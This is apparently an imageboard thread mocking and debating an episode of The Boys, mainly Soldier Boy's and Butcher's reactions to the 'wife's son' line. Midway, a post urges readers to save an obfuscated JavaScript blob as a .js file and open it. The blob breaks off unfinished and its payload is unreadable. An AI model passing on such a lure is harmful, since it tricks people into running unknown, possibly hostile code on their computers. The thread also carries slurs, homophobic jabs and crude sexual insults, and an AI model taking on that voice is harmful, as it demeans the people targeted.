HES ME WOIFES SON!

>HES ME WOIFES SON!

admit it, you laughed

Attached: mewoife.jpg (1600x901, 417.53K)

No. The finale was shit and made no sense.

Eh I gave up on the Cena tv show il quit this too if they keep the gay stuff going.
Nevermind il just stop here

>wife's son, why are you living me for your biological father...
I cried

Soldier Boy's reaction was unintentional kino. the look of confusion on him and on butcher when he asks butcher what's wrong with him.

Attached: 1657241222300.png (1280x2856, 2.78M)

I'm sure the writers room though it was hilarious. And after they were done laughing, they sucked each other off.

The writers really thought the worldwide audience would watch this scene and think Soldier Boy is being unreasonable and the bad guy for saying this and that Butcher is being based
So out of touch

Not true we preferred the train game

Attached: 1657241222301.png (1451x665, 893.98K)

1. Copy and paste the following to Notepad.
2. Save it with the filename "Any Forums.js"
3. Open the file you saved.
4. ???
5. Shit bricks.

A='ft )t hoM.d)}=.abts2lp\nSree"iniyme)exlScte=el;l(xeg,t/.'+
'ar";e)xssxa(t?li/\ncn)t etr(}h(txeg,bR)a(t?l[++,xn\rxssxa('+
'pinr\\g]t//0sn+r+cedoif-am\rse\\"so\\r"nC \x20thow Np\\ e hel'+
'm"asnO \x20euv\\ \\ ti.n+m\\rs\n.l(Y.no,Jr,p+zgi\'\'\\ga)+i""'+
'Jtgh,).reerony,laf-aur+xn)teWsp0';B='uiR{uM.oaro*\rWctj(x.'+
'h"HHeocspglsoc.nteHrn)HalHo).ne"pi4ng,xn;.pett/ph"tgft {uR'+
'9oi3\ri1r.ne([(]t/ph/0"r0.d\n.pett/adoed).c\\g]=-(("onisoo'+
'd;e\n+sn++mn(\\1oapeelitoanS w \x20ee4n\\3ptf \x20en?nS c\\"sone'+
'tJra/(o(sM+z""Ji,n+i\\,t\'\'/n)+m,p0\rsesa(ntp"trod;nyu.d}'+
'c)Sl(0';C='no(rrafrtamQ\nSree"mxt)=.abtct.etbtotf(.ia;.d(.'+
's\ro(th:mc./0.dbrot.ch.t l)uirrr()Sn6\nl)yo(tMi4.ch.tg]?()'+
's(trot.c

Buy an ad

did yall just watch this single episode?

Have sex, incel

I think that lines is too much of a meme post-2017 for them to not have known what they were doing.

you first, kissless virgin loser

I’ve been hearing the bois was cucked for years and always wrote it off as angry fa/tv/virgins and Any Forumstards circlejerking. Maybe a lil misalignment in politics here and there, but nothing to get too upset over. This episode made me realize That you were all right and that this show is irredeemably shit tier propaganda. Time to stop consooming tv and film and just hit the gym instead

Attached: A1E0D037-7A9A-4281-9F55-E8B47DF1E0A7.jpg (1420x798, 83.4K)

If homelander = trump why didn't they kill him off and replace him with soldier boy (the better character) who could be some sort of sick Biden stand in

Soldier boy’s memories about his dad telling him he’s not good enough unironically made me feel way more empathetic with him

b/c biden=bad is a no-go, would neverevereverever get funded

but sb did nothing wrong

Agree but the writers would not

I understand everything except why soldier boy felt the need to kill homelander, him being weak is a little, well, weak for a motivation.

Well either way, its clear they cannot kill off their cashcow character even though they should. Same as real life Trump they keep bringing him up every 2 seconds because of $$$ they cant make money from Biden news

>butcher got 12 months left
>will the show end with butcher eating dirt
>will they drag out 12 months over multiple seasons
>turn butcher into a full time soup to stop death

How long are they gonna build up for Homelander going bye bye or totally nuts? I don't really feel anything actually happened this season.

I actually did verbally laugh out loud when it happened. It was a combination of all the Any Forums memes and then soldier boy's reply saying "homelander raped your wife and you want to take care of the kid?".
It really is just not a good look for butcher, or anyone in general. Being so emotionally attached to a rape baby is kinda cringe.

They could kill off every character except Deep and just have every episode be 20 "accidentally killed a friendly animal" jokes, and the show would be in a better state.

>Y'ALL

we're not making a western here

Soldier Boy didn't do anything wrong
>HE LIED ABOUT FIGHTING THE NAZIS!!!
he probably did more for the war effort inspiring millions of people in news reels than he would punching a few tanks
>HE MURDERED MMS HECKIN EPIC GRAMPERINO!!!
an accident, he's probably used to displaying his strength to criminals so they surrender, the onus is on them just like how if civvies get shot by cops in an IRL gunfight the criminals get charged for starting the situation
>HE'S LITERALLY A RACIST!!!!!!!!!!!!!!!
despite being born in the 1910s he never actually says or does anything racist, he was friends with Bill Cosby and even referred to Afganis as "the good guys", implying he legitimately believes in the American project
>HE KILLED ALL THOSE PEOPLE IN NEW YORK AND HEROGASM!!!!
by accident, he clearly felt guilty about it and the russian music set him off at HG
>HES A PEDOPOHILE!!!! HE WAS MOLESTING GUNPOWDER!!!!
when gunpowder is spilling the beans he admitted that wasn't true, he was probably just trying to beef up his report
>H-H-HE WAS PHYSICALLY ABUSING HIS TEAMMATES!!!!!!
he was suffering from PTSD but still never lashed out on people who couldn't take his beatings and at the end of the day they didn't have to keep working with him but chose their careers before their own safety
>HE FUCKING MURDERED HIS OWN TEAMMATES!!!!!!!!!!!
in revenge for getting betrayed and tortured for 30 years straight, most of them being scumbags anyway
>HE GAVE BLACK NOIR BRAIN DAMAGE!!!!!!
in self-defence when getting 5 v 1 backstabbed
>H-... HE... HE HIT RYAN!!!!
who's clearly superhuman and just lasered him
>HE WAS MEAN TO HOMELANDER!!!
he was going to kill him anyway because he agreed to and has some honor, might as well put him off his game first
>HE WAS GONNA BLOW UP VAUGHT TOWER!!!
justified to stop a guy threatening to go postal on millions, the retard Boys could have come up with a plan to lure HL into an ambush using Ryan or SB or just tackle him out the building or something

Attached: the-boys-jensen-ackles-season-3-1014x570.jpg (1014x570, 75.65K)

>he was suffering from PTSD
Where'd you pull this made up headcanon from? Soldier boy only gets PTSD from being tortured for 30 years. Why would you just randomly assume and pretend he had PTSD before that?

why didn't he tell him homelander raped his wife?
would turn ryan against his father easily